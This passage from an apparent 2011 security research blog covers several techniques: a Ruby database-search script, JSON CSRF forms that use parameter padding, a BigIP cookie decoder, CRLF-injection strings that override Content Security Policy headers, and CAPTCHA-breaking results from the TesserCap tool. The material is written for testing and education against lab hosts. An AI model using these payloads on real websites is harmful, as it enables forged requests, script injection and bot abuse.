nil
end
end
options.dbs = dbs.compact
if(options.dbs.length == 0)
$stderr.puts "[-] No Database available. Exiting."
exit
end
options.sstrings.uniq!
if(options.show_schema)
puts
puts "+"*80
puts "Database Schemas"
puts "+"*80
options.dbs.each do |db|
puts
puts "[DATABASE] #{db}"
Sequel.sqlite(db) do |dbhandle|
dbhandle.tables.each do |table|
puts "\t[TABLE] #{table}"
puts "\t\t[COLUMNS] #{dbhandle[table.to_sym].columns.join(', ')}"
end
end
end
puts "-"*80
end
regex_strings = []
regex_strings = options.sstrings.collect do |search|
regexstr = ""
regex = nil
if(options.exact)
regexstr = "^#{search}$"
else
regexstr = "#{search}"
end
if(options.case_sensitive)
regex = Regexp.new("#{regexstr}")
else
regex = Regexp.new("#{regexstr}", Regexp::IGNORECASE)
end
regex
end
options.sstrings = regex_strings
options.dbs.each do |database|
if(options.verbose)
puts
puts "+"*80
puts "Analyzing Database '#{database}'"
puts "+"*80
end
Sequel.sqlite(database) do |databasehandle|
databasehandle.tables.each do |table|
if(options.verbose)
puts
puts "-"*80
puts "Analyzing Table '#{table}'"
puts "-"*80
end
options.sstrings.each do |regex|
if(regex.match(table.to_s))
puts "[+] Table Name Match Found -> Database '#{database}' -> TABLE '#{table}'"
end
end
#Column Name Search
databasehandle[table.to_sym].columns.each do |column_name|
options.sstrings.each do |regex|
if(regex.match(column_name.to_s))
puts "[+] Column Name Match Found -> Database '#{database}' -> TABLE '#{table}' -> COLUMN '#{column_name}'"
end
end
end
#Data Search
if(options.sstrings.length > 0 && !options.metadata)
row = 0
databasehandle[table].each do |rowHash|
row = row + 1
rowHash.each do |key, value|
options.sstrings.each do |regex|
if(regex.match(value.to_s))
puts "[+] Data Match Found -> Database '#{database}' -> TABLE '#{table}', COLUMN '#{key}' -> ROW '#{row}'"
puts "\t[*] Row Dump\t=>\t#{rowHash.values.join('|')}" if(options.rowdump)
end
end
end
end
end
end
end
end
</code></pre></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-863406868250387152011-12-22T21:49:00.000-08:002012-02-01T08:31:48.161-08:00JSON CSRF with Parameter Padding<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div class="MsoNormal">JavaScript Object Notation (JSON) format is one of the prominent data exchange formats of the contemporary web applications. When a web application implements JSON, Cross Site Request Forgery (CSRF) payload delivery gets bit tricky because of query string and JSON format mismatch. With couple of tricks however, we can successfully execute CSRF attacks with JSON payloads.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Let’s assume that the browser sends the following JSON to the web server.</div><div class="MsoNormal"><span style="color: red; font-family: "Courier New";">{"a":1,"b":{"c":3}}<o:p></o:p></span></div><div class="MsoNormal"><b><br />
</b></div><div class="MsoNormal"><b>Scenario 1:</b> One of the mechanisms to execute JSON CSRF is to use the entire JSON payload as parameter name in a self submitting form. For example, loading the HTML code below and clicking the submit button sends malicious JSON to the web server:</div><div class="MsoNormal"></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><span style="font-family: "Courier New", "Courier", monospace;"><html></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><form action=http://192.168.1.41:3000 method=post <span style="color: red;">enctype="text/plain"</span> ></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><input name='<span style="color: red;">{"a":1,"b":{"c":3}}</span>' type='hidden'></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><input type=submit></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"></form></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"></html></span></li>
</ol><br />
<br />
<div class="MsoNormal">At line# 2, the <span style="font-family: "Courier New";">enctype</span> form attribute is set to <span style="font-family: "Courier New";">text/plain</span> so that the JSON gets delivered as is. The <span style="font-family: "Courier New";">enctype</span> attribute may not be required, but is good to have. At line# 3, entire JSON payload is provided as a parameter name. When the form gets posted, the payload is delivered and CSRF executes.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: left;">Image below shows JSON payload delivery with the technique described above. </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwttXaVJspw-_Q39xTsBTm6n8VchALTkINFyxGC01lyzfaZaJKWollG-r3hlvu4s-7jkGEwcx-DJBspnETV0a8o2iYzrSeiu3IPd1sySiLmpxGVkL8S_07kPXYatC2YdXWlxh2y0WbyBxx/s1600/extra--equal--sign.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwttXaVJspw-_Q39xTsBTm6n8VchALTkINFyxGC01lyzfaZaJKWollG-r3hlvu4s-7jkGEwcx-DJBspnETV0a8o2iYzrSeiu3IPd1sySiLmpxGVkL8S_07kPXYatC2YdXWlxh2y0WbyBxx/s400/extra--equal--sign.png" width="400" /></a></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">This technique may fail in some cases when the server side JSON parsers reject the incoming JSON because of the trailing ‘=’ character.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><b>Scenario 2: JSON Parameter Padding to the rescue<o:p></o:p></b></div><div class="MsoNormal">In scenario 1, the trailing ‘=’ character may ruin the party when server side JSON parsers enforce strict parsing rules. To overcome this, an additional parameter can be padded towards the end of JSON payload to send a well formed JSON. Similar to GET & POST parameter processing, JSON parsers will successfully parse the JSON, pick the required parameters and ignore the extraneous ones. This allows a successful CSRF attack against vulnerable web applications. </div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Below, the HTML code in scenario 1 is modified to add an extraneous parameter to the JSON payload:</div><div class="MsoNormal"></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><span style="font-family: "Courier New", "Courier", monospace;"><html></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><form action=http://192.168.1.41:3000 method=post enctype="text/plain" ></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><input name='<span style="color: red;">{"a":1,"b":{"c":3}</span><span style="color: blue;">, "ignore_me":"</span>' value='<span style="color: blue;">test"</span><span style="color: red;">}</span>'type='hidden'></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"><input type=submit></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"></form></span></li>
<li><span style="font-family: "Courier New", "Courier", monospace;"></html></span></li>
</ol><br />
<br />
<div class="MsoNormal">At line# 3, the component in red is the original JSON and the blue component helps add the extraneous parameter to the JSON payload. The screenshot below shows the JSON payload delivered when the above HTML is executed. The <span style="font-family: "Courier New";">ignore_me</span> parameter absorbs the trailing '<span style="font-family: "Courier New";">='</span> character and has a value "<span style="font-family: "Courier New";">=test". </span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal">The end result, successful server side JSON Parsing and CSRF goodness :)</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Image shows a well formed JSON sent using parameter padding</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQUt2QwYCsTkl_WLRwX_Pxr0Rf8FWjvAf9Xlsgf3nCn0FFrmk5fQzRrFb6jW6f5mkYtfBqo9xiG483sQlWLoNb8A6Sm1BA7UicbzQqLOptluudS540AayTpWaP_V1l50R1klN5ttjKJ-r/s1600/parameter--padding--successful.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQUt2QwYCsTkl_WLRwX_Pxr0Rf8FWjvAf9Xlsgf3nCn0FFrmk5fQzRrFb6jW6f5mkYtfBqo9xiG483sQlWLoNb8A6Sm1BA7UicbzQqLOptluudS540AayTpWaP_V1l50R1klN5ttjKJ-r/s400/parameter--padding--successful.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="MsoNormal"></div><div class="MsoNormal">It is important to note that the discussed attack vectors may not work if the server validates the “Content-Type” request header to represent a JSON payload.</div><br />
<div class="MsoNormal"><br />
</div><br />
</div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-35932961931088492542011-12-18T10:48:00.000-08:002011-12-18T10:48:32.947-08:00Decoding BigIP Cookie<div dir="ltr" style="text-align: left;" trbidi="on">BigIP cookie contains internal network IP and port information in encoded format. When decoded, these cookies can help create an internal network map with potential web server IPs and their ports. <br />
<br />
F5 has described the encoding algorithm <a href="http://support.f5.com/kb/en-us/products/big-ip_ltm/manuals/product/ltm_configuration_guide_10_0_0/ltm_persist_profiles.html">here</a>. It works like this:<br />
<ol style="text-align: left;"><li>If the IP address is a.b.c.d, it is encoded as d*256^3 + c*256^2 + b*256 +a</li>
<li>To encode the port is to take the two bytes that store the port and reverse them. Thus, port 80 becomes 80 * 256 + 0 = 20480. Port 1433 (instead of 5 * 256 + 153) becomes 153 * 256 + 5 = 39173.</li>
<li>These values are combined into cookie as<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> <Encoded IP Address>.<Encoded Port Address>.<Componenet we are not concerned about></span></li>
</ol><div>These decoding mechanisms are packed into the following ruby script:</div><div><div><div></div><pre style="background: #dddddd; border: 1px dashed #CCCCCC; color: white; color: white; font-family: arial; font-size: 12px; height: auto; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/ruby
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#Cookie: BIGipcookie => 404007104.20480.0000</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#Cookie: BIGipcookie => 404007104.39173.0000</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if (ARGV.length == 0)</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> $stderr.puts "No input provided. Run as \n\tbigip.rb BigIP Cookie Value"</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> exit</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">end</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">ips = ARGV[0].split(".") </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">encoded_val = ips[0].to_i</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">port_val = ips[1].to_i</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">ip = []</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">port = []</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">4.times do</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> ip << encoded_val%256</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> encoded_val /= 256</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">end</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">2.times do </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> port << port_val%256</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> port_val /= 256</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">end</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">puts "IP Address : #{ip.join(".")}"</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">puts "Port : #{port[0]*256 + port[1]}"</span></div></code></pre><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBK3MYmR4RQLOvuMUv251af2m3yeXbV84hSVZH65tNCnr7yra81ZsFpEsreYddBLxYX2yn-8S0SDgfcfq9Rf-WIgm8L1Tdtn0lmEwXLBc2fS_TWWfbPIAhZ778MMmm9v2vGdfTS0wzlvJ_/s1600/bigip.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBK3MYmR4RQLOvuMUv251af2m3yeXbV84hSVZH65tNCnr7yra81ZsFpEsreYddBLxYX2yn-8S0SDgfcfq9Rf-WIgm8L1Tdtn0lmEwXLBc2fS_TWWfbPIAhZ778MMmm9v2vGdfTS0wzlvJ_/s320/bigip.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A Sample bigip.rb run</td></tr>
</tbody></table><br />
</div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-3268639301345243752011-11-28T09:41:00.000-08:002011-12-06T09:07:09.545-08:00Evading Content Security Policy With CRLF Injection<div dir="ltr" style="text-align: left;" trbidi="on">Content Security Policy (<a href="https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html">CSP</a>) was developed with the aim of reducing content injection attacks like Cross Site Scripting. CSP allows the developers to specify the permitted content sources for their web applications and relies on HTTP response headers to enforce content restrictions.<br />
<br />
When CSP is implemented by the web application and supported by the web browser, content injection attacks can be performed by:<br />
<br />
<ol style="text-align: left;"><li>Exploiting flaws in browser CSP implementation</li>
<li>Manipulating HTTP response headers.</li>
</ol><br />
<a href="https://www.owasp.org/index.php/CRLF_Injection">CRLF</a> injection is one possible technique by which an attacker can control HTTP response headers. If client provided parameters are returned in response headers without any validation, CRLF injection can be used to bypass CSP restrictions. <br />
<br />
For demonstrations, two web pages were setup with the following content at two different origins<br />
<b>Webpage 1:</b> http://localhost:3000/csp<br />
<b>Content:</b><br />
<span class="Apple-style-span" style="font-family: "Courier New", "Courier", monospace;">http://localhost:3333/xss.js</span><br />
<script src="http://localhost:3333/xss.js">
</script><br />
<b>Webpage 2:</b> http://localhost:3333/xss.js <br />
<b>Content:</b><br />
<span class="Apple-style-span" style="font-family: "Courier New", "Courier", monospace;">alert('XSS’)</span><br />
<br />
<br />
<b>CRLF Injection and CSP:</b><br />
If a HTTP response contains same HTTP header multiple times, different browsers interpret the headers differently. Certain browsers interpret the first occurrence of the HTTP header, others choose the last one. Hence, positioning of CSP directive (X-Content-Security-Policy) in application response can play an interesting role. In the discussion below, we assume that the web application implements CSP and is vulnerable to CRLF injection:<br />
<br />
<b>Case 1:</b> <b><i>Attack vector is returned before the CSP header in the HTTP response headers: </i></b><br />
<b>Case 1a:</b> If the browser picks the first occurrence of the CSP header, CRLF injection can then be used to insert a CSP header with following attack vector:<br />
<br />
<span class="Apple-style-span" style="font-family: "Courier New", "Courier", monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow *</span><br />
<br />
In this case, the web browser will interpret the first CSP header and will happily retrieve content from any malicious URL.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrrB59_FWGLSc7vba6DozX_9X0-IvWjWqulWF7obFvkBfjDatrSKtBaNJSU_Dl3ukgaPmHACmQ4oFZ1-NyPEDftljvITHabduYPwXuJf_ZVyhPldq9asd_2aMtnnWZ9j7w8XiBfI7KTCd/s1600/csp--1st.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrrB59_FWGLSc7vba6DozX_9X0-IvWjWqulWF7obFvkBfjDatrSKtBaNJSU_Dl3ukgaPmHACmQ4oFZ1-NyPEDftljvITHabduYPwXuJf_ZVyhPldq9asd_2aMtnnWZ9j7w8XiBfI7KTCd/s400/csp--1st.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "Calibri", sans-serif; font-size: 11pt; line-height: 115%;">Image shows malicious CSP directive inserted before the legitimate header </span></td></tr>
</tbody></table><br />
<b>Case 1b:</b> If the browser picks the last occurrence of the CSP header, following CRLF injection attack vector can be used to insert custom CSP header.<br />
<br />
<span class="Apple-style-span" style="font-family: "Courier New", "Courier", monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow *%0d%0a%0d%0a </span><br />
<br />
Two trailing occurrences of CRLF will push the CSP directive into the content and will not be interpreted as a CSP directive. This again allows attacker to bypass CSP protection and execute and source arbitrary content.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZT_ibxSJ4paYe3pDzqCeYS09SP7mIMLS-fBlwdKaAQrvvJP0Bt3CDC1HRY4jou4EFw4_8DbTYqplc31DosJQKLN6o9gSQ45dfCFeIsBs3JI2YUc1CveCLLmHRYKqaXcgeUGfAwe_LBx4d/s1600/x--content--pushed--out.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZT_ibxSJ4paYe3pDzqCeYS09SP7mIMLS-fBlwdKaAQrvvJP0Bt3CDC1HRY4jou4EFw4_8DbTYqplc31DosJQKLN6o9gSQ45dfCFeIsBs3JI2YUc1CveCLLmHRYKqaXcgeUGfAwe_LBx4d/s400/x--content--pushed--out.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "Calibri", sans-serif; font-size: 11pt; line-height: 115%;">Image shows CSP directive pushed out to response body and rendered ineffective </span></td></tr>
</tbody></table><br />
<b>Case 2: <i>Attack vector is returned after the CSP header in the HTTP response headers </i></b><br />
<b>Case 2a:</b> If the browser picks the first occurrence of the CSP header, the CSP directive cannot be overridden for the current resource. For an attack to function one has to look into the possibility of exploiting HTTP Response Splitting.<br />
<br />
<b>Case 2b:</b> If the browser picks the last occurrence of the CSP header, CRLF injection can be used to insert a malicious header similar to case 1a.<br />
<br />
<span class="Apple-style-span" style="font-family: "Courier New", "Courier", monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow * </span><br />
<br />
This will cause the browser to interpret the CSP directive as allow * to retrieve content from arbitrary URLs.<br />
<br />
It was observed that when more than one X-Content-Security-Policy headers were received by Firefox (7.0.1), it securely defaulted to same origin policy for all content. <br />
<br />
The POC below pushes the headers out to the response body by two CRLF sequences to achieve script execution.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBbGaeyy1bgp-iuSnP93CLVv5ipWZnnmRWbmg83D8256mt7QVr4HWgL9YI79SVq1e4ovfCSmGghJOYhsFXBPswWFA-fmYd-iIwKEIJ1BcjUnhwmnTAwDcnDSXNcGIsFKR8RUX6cWtg49y/s1600/no--xss--csp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBbGaeyy1bgp-iuSnP93CLVv5ipWZnnmRWbmg83D8256mt7QVr4HWgL9YI79SVq1e4ovfCSmGghJOYhsFXBPswWFA-fmYd-iIwKEIJ1BcjUnhwmnTAwDcnDSXNcGIsFKR8RUX6cWtg49y/s400/no--xss--csp.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "Calibri", sans-serif; font-size: 11pt; line-height: 115%;">Image shows script execution prevented from a different origin (http://localhost:3333)<br />
</span></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nyz48qjAUmBDlm2qv9aGWvH7N27qmCm0C05TJWT8QJ3RQ_wHBDKTGtVKFG9861W53QZDquDo71J3jKNuJevEMimQHBtZj9XJh6KNt5TEMt1OOELxZLru_8Z8VOh_U1zGRrvLSdu1Abzr/s1600/xss--successful--2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nyz48qjAUmBDlm2qv9aGWvH7N27qmCm0C05TJWT8QJ3RQ_wHBDKTGtVKFG9861W53QZDquDo71J3jKNuJevEMimQHBtZj9XJh6KNt5TEMt1OOELxZLru_8Z8VOh_U1zGRrvLSdu1Abzr/s400/xss--successful--2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "Calibri", sans-serif; font-size: 11pt; line-height: 115%;">Image shows successful script execution when the page was vulnerable CRLF injection</span></td></tr>
</tbody></table><br />
<br />
</div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-31990828455089007742011-11-17T06:57:00.000-08:002012-12-31T12:00:06.038-08:00CAPTCHA Hax With TesserCap<div dir="ltr" style="text-align: left;" trbidi="on">
This blog post was voted as 8th best in <a href="https://blog.whitehatsec.com/vote-now-top-ten-web-hacking-techniques-of-2011/" target="_blank">Top 10 Web Hacking Techniques of 2011</a> poll<i style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 16.78333282470703px;">.</i><br />
<br />
With the goal of creating a tool that can help security professionals and developers to test their CAPTCHA schemes, I conducted a research on over 200 high traffic websites and several CAPTCHA service providers listed on <a href="http://www.quantcast.com/top-sites-1">Quantcast’s Top 1 Million Ranking Websites</a>. <br />
<br />
During the same time frame, students at the Stanford University also conducted a similar <a href="http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf">research (PDF)</a>. Both research works concluded the obvious:<br />
<br />
<b>An alarming number of CAPTCHAs schemes are vulnerable to automated attacks.</b><br />
<br />
I looked around, tested and zeroed in on Tesseract-OCR as my OCR engine. To remove color complexities, spatial irregularities, and other types of random noise from CAPTCHAs, I decided to write my own image preprocessing engine. After a few months of research, coding and testing in my spare time, TesserCap was born and is ready for release now. <br />
<br />
TesserCap is a GUI based, point and shoot CAPTCHA analysis tool with the following features: <br />
<ol>
<li>A generic image preprocessing engine that can be configured as per the CAPTCHA type being analyzed. </li>
<li>Tesseract-OCR as its OCR engine to retrieve text from preprocessed CAPTCHAs. </li>
<li>Web proxy support</li>
<li>Support for custom HTTP headers to retrieve CAPTCHAs from websites that require cookies or special HTTP headers in requests</li>
<li>CAPTCHA statistical analysis support</li>
<li>Character set selection for the OCR Engine</li>
</ol>
An example TesserCap image preprocessing and run on Wikipedia (Wikimedia’s Fancy CAPTCHA) is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpj6vnjbvGiBSxoYeHWxndVfrmcRRDxY0cG3AHciMszEn_gE1Y8BmfzYWDyx2kZ_oiGmMl2XJegx3mwsQxY7KDnTpG20E9e0yI7pUrPd4WtzeSjp6qSwYVUw8w3Y_aKsMcrcvfXQPZlSA/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpj6vnjbvGiBSxoYeHWxndVfrmcRRDxY0cG3AHciMszEn_gE1Y8BmfzYWDyx2kZ_oiGmMl2XJegx3mwsQxY7KDnTpG20E9e0yI7pUrPd4WtzeSjp6qSwYVUw8w3Y_aKsMcrcvfXQPZlSA/s320/p1.png" width="320" /></a></div>
<br />
<br />
<h1>
Downloads</h1>
TesserCap and it's user manual can be downloaded from one of the following locations:<br />
<ul>
<li><a href="http://www.opensecurityresearch.com/files/tessercap.zip">http://www.opensecurityresearch.com/files/tessercap.zip</a> -- No password protection on this zip file</li>
<li><a href="http://www.mcafee.com/us/downloads/free-tools/tessercap.aspx">http://www.mcafee.com/us/downloads/free-tools/tessercap.aspx</a> -- Use password as "foundstone" without quotes to extract this zip file.</li>
</ul>
<h1>
Results</h1>
The two tables below summarize the CAPTCHA analysis performed using TesserCap for few popular websites and some CAPTCHA service providers. All these tests were performed using TesserCap’s image preprocessing module and Tesseract-OCR’s default training data.<br />
<br />
<br />
<br />
<br />
<br />
<center>
<br />
<br />
<table border="1"><tbody>
<tr> <td><b>Website</b></td> <td><b>Accuracy*</b></td> <td><b>Quantcast Rank</b></td> </tr>
<tr> <td>wikipedia</td> <td>20-30%</td> <td>7</td> </tr>
<tr> <td>ebay</td> <td>20-30%</td> <td>11</td> </tr>
<tr> <td>reddit.com</td> <td>20-30%</td> <td>68</td> </tr>
<tr> <td>CNBC</td> <td>50+%</td> <td>121</td> </tr>
<tr> <td>foodnetwork.com</td> <td>80-90%</td> <td>160</td> </tr>
<tr> <td>dailymail.co.uk</td> <td>30+%</td> <td>245</td> </tr>
<tr> <td>megaupload.com </td> <td>80+%</td> <td>1000</td> </tr>
<tr> <td>pastebin.com</td> <td>70-80%</td> <td>32,534</td> </tr>
<tr> <td>cavenue.com</td> <td>80+%</td> <td>149,645</td> </tr>
</tbody></table>
<br />
<br />
<br />
<br />
<table border="1"><tbody>
<tr> <td><b>CAPTCHA Provider</b></td> <td><b>Accuracy*</b></td> </tr>
<tr> <td>captchas.net</td> <td>40-50%</td> </tr>
<tr> <td>opencaptcha.com</td> <td>20-30%</td> </tr>
<tr> <td>snaphost.com</td> <td>60+%</td> </tr>
<tr> <td>captchacreator.com</td> <td>10-20%</td> </tr>
<tr> <td>www.phpcaptcha.org</td> <td>10-20%</td> </tr>
<tr> <td>webspamprotect.com</td> <td>40+%</td> </tr>
<tr> <td>ReCaptcha</td> <td>0%</td> </tr>
</tbody></table>
</center>
<br />
<br />
<br />
*This accuracy maybe further increased by training the Tesseract-OCR engine for the CAPTCHAs under test.<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">Wikipedia</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazLc-ZHQx6cIieFTw1ZPqAeXY68tlBx-olwcdUBzxSiYKEIUUEjcgfGyZrDaFD5ZHZ6PUOy1Trh2LQCHjv1n-lRFMTDR1VMClo10EVC2kpgNbYR7FE_ubS5R410ZuViKD64-t35vQwC8/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazLc-ZHQx6cIieFTw1ZPqAeXY68tlBx-olwcdUBzxSiYKEIUUEjcgfGyZrDaFD5ZHZ6PUOy1Trh2LQCHjv1n-lRFMTDR1VMClo10EVC2kpgNbYR7FE_ubS5R410ZuViKD64-t35vQwC8/s320/p2.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">OpenCaptcha Preprocessing</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQpFzMXPnZ-S0xmQ_qODT5-H1uHILGUglLs_cSkx-2MZZ-Khq77hM-ozhpC3ZI5rdpvSzjLi_Zvi2-xFRWbrqqCJZlt0XzIZbEeHMMDIOI95FyC8FI1Z61uisZLoplQ-cwECDBuq06RK8/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQpFzMXPnZ-S0xmQ_qODT5-H1uHILGUglLs_cSkx-2MZZ-Khq77hM-ozhpC3ZI5rdpvSzjLi_Zvi2-xFRWbrqqCJZlt0XzIZbEeHMMDIOI95FyC8FI1Z61uisZLoplQ-cwECDBuq06RK8/s320/p3.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">OpenCaptcha Sample Run</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
